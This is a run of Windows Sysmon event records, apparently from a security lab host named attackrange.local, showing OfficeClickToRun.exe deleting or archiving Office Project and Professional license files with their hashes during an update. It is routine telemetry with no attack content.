Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul.xrm-msMD5=9CE1D155CE93ABD731850BF88592D601,SHA256=E7C10E5A4DB1065DEC48FB4FC337D2E1EC4BB3AA586A67EA625C14DD389D3127,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-msMD5=0E04BB4EBE68995C5FBE147522270E17,SHA256=D94AE00AAB6C7CC9B92BF80991DF4D0654BFA0B0D8C36ECDC39545E39F088406,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ppd.xrm-msMD5=A71C0D74D1D46CAC3319F3093DA32B37,SHA256=017EA793002F9A942A3A907ABACB39BDFA6C05A205E5169E4A2BFD81CE63356F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-msMD5=E482A06E75F20C3E10F09BB3451F895D,SHA256=24C01ADAAE5693D0603C3AA7681A1D5707B30986A9B9FC8937C8DE06B6F1AFA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-oob.xrm-msMD5=FB897622B12A8E4997B17052EB8BDD5F,SHA256=219D033779342430A0B9EDD0218641A52F15DC25606248E41E8C5215BBD4B04F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019VL_MAK_AE-ppd.xrm-msMD5=061B6E91F609C6209778EE70F3D860E5,SHA256=177442C89F3B28895D133BFBF97E5A9BCB42A684981FBD889D33B558835232E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019VL_MAK_AE-pl.xrm-msMD5=E1AE6D7ECD7FCC8CA6801C7580E9BA9B,SHA256=3DA2A0A731C2004D81AAD4DB7A6B4896A586D6D14FA438D4520177BC3FAA5A3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ul.xrm-msMD5=454C168AACF8CDA54264B8557815ABA9,SHA256=9A390AB4AB6766A671A290F1BB26ECC144CA2724607886DFE86B7F53666DECA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=C51D90565C848F2D43A37D4D2DCF145E,SHA256=6B38D5954FA95FDA9B3CF302EC6B31874B4F13CF1A8A1CD3480D2C9C511A763B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-msMD5=6F1A8C000B99B4376DEA8D76A5826689,SHA256=E3685BD149D77CAD42F756DDFD5C68CB81BA4276C6E8BB098ACB2F4F4027A435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Trial-ul-oob.xrm-msMD5=BFC3DF371DBEC498246295039DEE6F5D,SHA256=3960B30623326F5AE9B09D0EC002F104613F67DBB8A1C508CE5BA4DFFF97CA03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Trial-ppd.xrm-msMD5=BAAB3B8E4EF93B6E30B74B0BC1F5F54A,SHA256=C289A3DE34D516F849A43435E6FE6C039394F0325C3053F9B2B6FEB9A4AF8ABA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Trial-pl.xrm-msMD5=F10CDFEF2BC7EDFE7BC3616F8150ED89,SHA256=98BE4F83562D825FB46017E248CFAF73D0290331537CA82DBC6B2FB2B543018A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Retail-ul-phn.xrm-msMD5=D4DB510BFBC849B15EB84450712DF59F,SHA256=1A9668AB9CC5CF3AABC3F91EF0808912C303DE8A84F95BDD68A50BDFA557D5A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Retail-ul-oob.xrm-msMD5=2CFD789D00C2C60BC6628D667F9FB61A,SHA256=B0871EB85397857417987677DB3C3CD4C3797709B82A0BC12691D9ACD448D025,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Retail-ppd.xrm-msMD5=D20291DF9220EA5BDEACB54F8A91E025,SHA256=0FC24DBEF1DBCED8DF6690F254F6C82D2E93B1A4E8B9C3C37408E5056AADEB60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Retail-pl.xrm-msMD5=A9B1257134BFAC78EA3DAEBE481B25D6,SHA256=AA3D1053E2796EF3ACCFE90622FCCDCA8F1365B30A640D3862F058FC53433331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_PrepidBypass-ul-oob.xrm-msMD5=34A56A09D4C350912DE15E47005B231D,SHA256=B5A97569868197D07CD99F0B975ADDE3654BEE7A91BA9655AE27495B52A9D2DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-msMD5=5E076B89638AC4B196822A3ECE0D8786,SHA256=5F424577168E5A533FC7B3FCC80BB698B41545D98EE04860D04635F3F0D1A807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-phn.xrm-msMD5=9857D025D6F8F124807223D0C0CAEF12,SHA256=581A4FCD324E666F8EADF13802694EE4A8CE455D686992D12F9D422856CAA9F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-oob.xrm-msMD5=F3E2B8122C5CB9682B28E004A2E7F5C8,SHA256=B3BEB161B8642E0EB822BE98E2F08668E8828965C84C56C6B32CED2BDBB59564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_OEM_Perp-ppd.xrm-msMD5=0D1D910F8D5D4F56BE2B2F62E14BE4B1,SHA256=4D102340977AFBB924B6DB25E3DF95EA1759A04B3B9FC4237D29A62250B9AED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_OEM_Perp-pl.xrm-msMD5=B9DAC8241142AFB33155797DC3F040F7,SHA256=E620550CED025E551037ECB6DA406F988E24490D0AC0733E8696046C61410E48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Grace-ul-oob.xrm-msMD5=473AA417CEB9901DB16264642940FBE4,SHA256=F1FEE2E9A826625159DB555013D58385568EA53CBDA5F032CDB964233A622228,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019R_Grace-ppd.xrm-msMD5=1FB10C7A0D1E20B8CBC2D149CD72F97C,SHA256=5800C6FD5DBE5ACA3956A8CAC935194DAE7C1C0A00999815B85FABE143755027,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-phn.xrm-msMD5=450AF255F8278D3BC665D1A9DAD8DE6F,SHA256=903ABE75264BBE492327EF6380189CC9EF3EE52A8FB3CAC07EC8DC778DA4E2D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-oob.xrm-msMD5=8A6B3F9601AEAB10096782CF84E01E47,SHA256=1A94583A80ABAF70909E3EF0117108C079F8FF90A0AFD8B738D16C55F857C747,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019MSDNR_Retail-ppd.xrm-msMD5=C91055E684819F970C4FBA8B8757F118,SHA256=CDA789848F50C683CC4CE7D24741A1D5AE0B46A53714ADAA3E901DDB74D68A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019MSDNR_Retail-pl.xrm-msMD5=AB265372F7FA6FCDC1EEF29F6AB31F2E,SHA256=A5940F1A22102F1095E186B7AD674AAA3C858ECDCA8636DE6505B6D9172F8E27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019DemoR_BypassTrial180-ul-oob.xrm-msMD5=549FC609FFF742BBB26BF8F76A396ECE,SHA256=C5179E1C8A8BA83EC70EEA50EF544B749CE57FC83BB17ADD44CFF6D684C3A014,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019DemoR_BypassTrial180-ppd.xrm-msMD5=3418E747E86F83079FD4D2BFCA960363,SHA256=23CBF1BDB549114E8CBB1823D44B1CDC8DC54483D204E4B08E8C026695304E9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Trial-ul-oob.xrm-msMD5=91F98CCD5B8F9AE4A8FC6D6CA6F74648,SHA256=A661A36D8C99614B9198C24D027932E9B5978B2817C7D4838503CED610C1C379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Trial-ppd.xrm-msMD5=6B1157535E60AE4254BC6FBF86809E01,SHA256=F07EBEC9E9AD1341EAD858A4A2846EE7BBA08A7704EF269A652B6D7ED22C60D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Trial-pl.xrm-msMD5=585FBEB32955ED3EC99267E0958991BF,SHA256=2602FE6616F8D5A2BB216525A35A21C653ECDB990CCC03D9D61EB15B04FDEB2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Retail-ul-phn.xrm-msMD5=9258A11369B74F43D54C19956F237DB5,SHA256=F1E4505DC6361A12CB0020330E3553ECA418AE27854A5280894ADEC2B87E66CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Retail-ul-oob.xrm-msMD5=57460CD679DE35AF3000CF4B4538FE37,SHA256=86EBF0E24626948372016B83C4B9390759C385408E2406EC06171DAEAC089456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Retail-ppd.xrm-msMD5=A702A6F50FC029D3E07421E8E49A564A,SHA256=2767C595F3FED32519BC7DAC103405B6EFAA7DD70FDC2EE8055D204A35BA5EA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Retail-pl.xrm-msMD5=000E71B2A99F903AE8B28C8573357F1C,SHA256=F9F9CE0C729ACFC954B080F982E65855F63E58278446756F83AA4BBF24DEB92B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_OEM_Perp-ul-phn.xrm-msMD5=1910608559268BB1FB4A8EAF387597E2,SHA256=255777E7BAC79CDE4D775CFAD189E696ECCE964DB421571D141851FCA49464F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_OEM_Perp-ul-oob.xrm-msMD5=6F64BBE3811965B2F9935928459725A5,SHA256=53BACD362C2F671AC1C60A0B0CE50ED3A005E317DA8777538CA934263289A35E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_OEM_Perp-ppd.xrm-msMD5=4996C1DE74F3EC40808B42E49EEE64E4,SHA256=4330D35575655AA6FFCBCAF297E035279B3B5B47EE1D114DA864E3778E5292C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_OEM_Perp-pl.xrm-msMD5=CC48B200C96A32A263DBF7EA4046698E,SHA256=BCF388DEE45AE55868480C49148580B0FD4B766129D59D425F2643C00ACE1009,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Grace-ul-oob.xrm-msMD5=F5D1963118195557370ECF03CDE5A2B6,SHA256=78A7D8AF92B6DD5A92E36D2B46682518CECD10F37023110AD3A2EB1CCDA6D906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalR_Grace-ppd.xrm-msMD5=BBDE6FDD3AA7F31973E3D73DF966B399,SHA256=3FEAA402BB166619B81B566E2D7207BCFF3CE976093E0F9A3D0134F8DA838234,IMPHASH=00000000000000000000000000000000falsetrue 